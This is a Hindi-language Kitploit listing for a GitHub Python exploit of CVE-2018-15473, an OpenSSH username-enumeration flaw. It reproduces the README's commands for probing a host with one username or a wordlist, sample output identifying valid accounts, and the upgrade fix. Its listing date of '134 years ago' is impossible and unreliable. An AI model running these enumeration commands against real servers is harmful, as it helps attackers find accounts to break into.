Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-15473 — CVE-2018-15473 के लिए Python-आधारित शोषण, प्रमाणीकरण प्रतिक्रिया ओरेकल के माध्यम से OpenSSH उपयोगकर्ता नाम गणना को सक्षम करता है, जिसमें एकल-उपयोगकर्ता और वर्डलिस्ट मोड हैं। | Kitploit
उपकरण/GitHubGitHub/0xrobiul/cve-2018-15473
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंग
GitHub0xrobiul/cve-2018-15473

CVE-2018-15473

CVE-2018-15473 के लिए Python-आधारित शोषण, प्रमाणीकरण प्रतिक्रिया ओरेकल के माध्यम से OpenSSH उपयोगकर्ता नाम गणना को सक्षम करता है, जिसमें एकल-उपयोगकर्ता और वर्डलिस्ट मोड हैं।

रिपॉजिटरी देखें
134 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2018-15473

SSH उपयोगकर्ता नाम गणना शोषण (OpenSSH 2.3 < 7.7)

मूल शोषण का संपादित संस्करण: https://www.exploit-db.com/exploits/45233

  • Python3 में परिवर्तित किया गया

  • उपयोगकर्ता नाम शब्दसूची विकल्प जोड़ा गया

कैसे चलाएं


#Install the requirements:

foo@bar:~$ pip3 install -r requirements.txt


#For single username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -u root

[+] root is a valid username


#For multiple username:

foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt

[+] root is a valid username

[-] mysql is an invalid username

[-] mike is an invalid username

[-] foo is an invalid username

[-] bar is an invalid username

Valid Users: 

root


#For more option:

foo@bar:~$ ./Exploit.py -h

भेद्यता के बारे में:

सिस्टम वैध और अमान्य प्रमाणीकरण प्रयासों पर अलग-अलग प्रतिक्रिया देता है। एक दूरस्थ उपयोगकर्ता लक्ष्य प्रणाली पर वैध उपयोगकर्ता नाम निर्धारित करने के लिए विशेष रूप से तैयार किए गए अनुरोध भेज सकता है। इस प्रकार, एक दूरस्थ उपयोगकर्ता लक्ष्य प्रणाली पर वैध उपयोगकर्ता नाम निर्धारित कर सकता है।

समाधान:

OpenSSH सर्वर को संस्करण 7.7 या उससे उच्चतर में अपग्रेड किया जाना चाहिए।

टूल डाउनलोड करें